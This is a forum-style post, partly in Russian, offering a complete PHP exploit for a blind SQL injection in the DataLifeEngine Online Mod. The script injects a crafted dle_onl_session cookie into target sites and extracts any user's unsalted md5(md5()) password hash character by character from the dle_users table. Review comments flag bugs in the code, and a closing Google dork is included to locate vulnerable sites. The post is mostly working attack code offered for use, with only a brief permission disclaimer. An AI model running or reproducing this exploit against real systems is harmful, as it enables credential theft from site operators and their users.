
DataLifeEngine Online Mod Exploit Blind SQL Injection
DLE Online Mod Exploit Blind SQL Injection
Нашел багу я, а эксплойт написал Евгений Минаев
Сохраняем эксплойт и закидываем его к себе на локалхост (нужен веб-сервер с PHP), оттуда запускаем: скрипт сам ходит на целевой сайт по HTTP (fsockopen, порт 80). Применять только к системам, на тестирование которых у вас есть разрешение.
Вытаскивает хеш пароля любого пользователя по его user_id (поле password таблицы dle_users). По словам автора, хеш считается как md5(md5($pass)) — это хеширование (без соли), а не шифрование.
PHP код:
<?php
/* vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4: */
/**
* DataLifeEngine Online Mod Exploit Blind SQL Injection. Found by Maxster
* Requires magic_quotes_gpc=Off on the target (the single quote in the injected cookie must reach the query unescaped) and MySQL newer than 4.0 (the payload relies on subqueries).
*
* Useful: email, password, name
*
* PHP versions 4 and 5
*
* LICENSE: This source file is subject to version 3.0 of the PHP license
* that is available through the world-wide-web at the following URI:
* http://www.php.net/license/3_0.txt. If you did not receive a copy of
* the PHP License and are unable to obtain it through the web, please
* send a note to license@php.net so we can mail you a copy immediately.
*
* @category Exploit
* @package None
* @author Eugene Minaev <underwater@itdefence.ru>
* @copyright 2008 ITDefence.ru
* @license http://www.php.net/license/3_0.txt PHP License 3.0
* @version CVS: $Id:$
* @link http://underwater.itdefence.ru
* @since File available since Release 0x00
*/
// The blind-injection loop below issues one HTTP request per guessed character,
// so lift max_execution_time for this script.
@set_time_limit(0);
// NOTE(review): 'output_buffer' is not a PHP ini directive (the real one is
// 'output_buffering', which is PHP_INI_PERDIR and cannot be changed with ini_set()
// at runtime anyway), so this call is a silent no-op behind the @ suppression.
@ini_set('output_buffer', 0);
?>
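<html>
<head>
<title>DataLifeEngine Online Mod Exploit Blind SQL Injection</title>
<style type="text/css">
body{
font-family: Tahoma;
font-size: 12px;
color: #e1e1e1;
background-color: #222;
}
</style>
</head>
<body>
<center>
<!-- Input form; it posts back to this same script, which handles the request
     when $_POST is non-empty. SCRIPT_NAME is normally server-derived rather than
     attacker-controlled, but it is still escaped before being placed inside the
     action attribute so an unusual request path cannot break out of it. -->
<form method="post" action="<?php echo htmlspecialchars($_SERVER['SCRIPT_NAME'], ENT_QUOTES); ?>">
dle path:<input type="text" name="server" value="http://localhost/dle/" />
<br/><br/>
admin id: <input type="text" name="userid" value="1" />
<br/><br/>
<input type="submit" />
</form>
</center>
</body>
</html>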
<?php
// Request handler: runs only after the form above has been submitted.
// Preconditions stated in the file header: magic_quotes_gpc off on the target
// (the cookie must keep its single quote) and MySQL newer than 4.0 (the payload
// uses subqueries). Use only against systems you are authorised to test.
if (!empty($_POST))
{
// Tiny "abort with a message" helper. NOTE(review): create_function() was
// deprecated in PHP 7.2 and removed in 8.0, so this line fails on current PHP.
$_ = create_function('$error', 'die("$error");');
// user_id of the account whose hash is extracted. The int cast is what keeps
// this value safe when it is interpolated into the SQL payload below.
$userid = isset($_POST['userid']) ? (int) $_POST['userid'] : null;
// Target base URL (e.g. http://host/dle/); split with parse_url() below.
$server = isset($_POST['server']) ? $_POST['server'] : null;
// Candidate characters, tried in this order at every position. Lowercase hex
// only; the loop below stops once 32 characters have been recovered.
$alphabet = array('a', 'b', 'c', 'd', 'e', 'f', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0');
$responce = null;
$password = null; // recovered hash, built one character at a time
$curpos = 1;      // 1-based SUBSTRING() position currently being guessed
$alppos = 0;      // index into $alphabet of the current candidate
$flag = false;
$pathinfo = parse_url($server);
if (false === is_array($pathinfo) or empty($pathinfo['host'])) {
$_('invalid url');
} else {
// Port is hard-coded to 80: a port given in the URL is ignored and https
// targets cannot be reached this way.
$fsocket = fsockopen($pathinfo['host'], 80) or
$_('hostname is dead');
// Probe request: a cookie value containing a bare single quote. The target is
// treated as vulnerable if the page body contains 'MySQL Error' (checked
// below). NOTE(review): $pathinfo['path'] is unset when the URL has no path,
// which produces the malformed request line "GET  HTTP/1.1".
$request = "GET {$pathinfo['path']} HTTP/1.1\r\n"
. "Host: {$pathinfo['host']}\r\n"
. "Cookie: dle_onl_session='underWHAT?!\r\n\r\n";
fwrite($fsocket, $request) or
$_ ('failed to write data to socket');
// Read until '</html>' appears. NOTE(review): if that marker never arrives
// (error page without it, different case, connection closed early), fread()
// keeps returning '' and this loop never terminates. The ternary also treats
// a match at offset 0 as "not found".
while ($flag === false){
$responce .= fread($fsocket, 128);
$flag = strpos($responce, '</html>') ? true: false;
}
$flag = false;
// NOTE(review): this first socket is never fclose()d; $fsocket is simply
// reassigned inside the loop. The '> 0' test also misses a match at offset 0.
if (strpos($responce, 'MySQL Error') > 0){
// Blind extraction: one request per (position, candidate) pair until all
// 32 characters of the stored hash are known.
while (strlen($password) < 32)
{
$fsocket = fsockopen($pathinfo['host'], 80) or
$_('hostname is dead');
$responce = null;
// Injected cookie. When the guessed character is correct if() yields 1; when
// it is wrong if() evaluates the two-row subquery, which makes MySQL raise an
// error whose text contains 'returns more than 1 row' -- that text is the oracle.
$cookie = "' or 1=if(substring((select password from dle_users where user_id = $userid),$curpos,1)='{$alphabet[$alppos]}',1,(select 1 union select 3))/*";
$request = "GET {$pathinfo['path']} HTTP/1.1\r\n"
. "Host: {$pathinfo['host']}\r\n"
. "Connection: close\r\n"
. "Cookie: dle_onl_session=$cookie\r\n\r\n";
fwrite($fsocket, $request) or
$_ ('failed to write data to socket');
// Single 8000-byte read. NOTE(review): if the error text lies beyond the
// first 8000 bytes (or at offset 0) it is not seen and the wrong candidate is
// accepted as correct.
$responce = fread($fsocket, 8000);
if (!strpos($responce, 'returns more than 1 row')){
// No error in the response: accept the candidate and move to the next position.
$password .= $alphabet[$alppos];
$curpos += 1;
$alppos = 0;
} else {
// Error seen: try the next candidate. NOTE(review): $alppos is never bounded;
// if no candidate matches at some position (e.g. the stored value is not
// 32 hex characters) it runs past the end of $alphabet and this loop never ends.
$alppos += 1;
}
$flag = false;
$responce = null;
fclose($fsocket);
}
} else {
die ('<center><h1>not vulnerable</h1></center>');
}
// Print the recovered hash.
echo "<center><h1>$password</h1></center>";
}
}
?>
Google dork: "20ка посетивших:"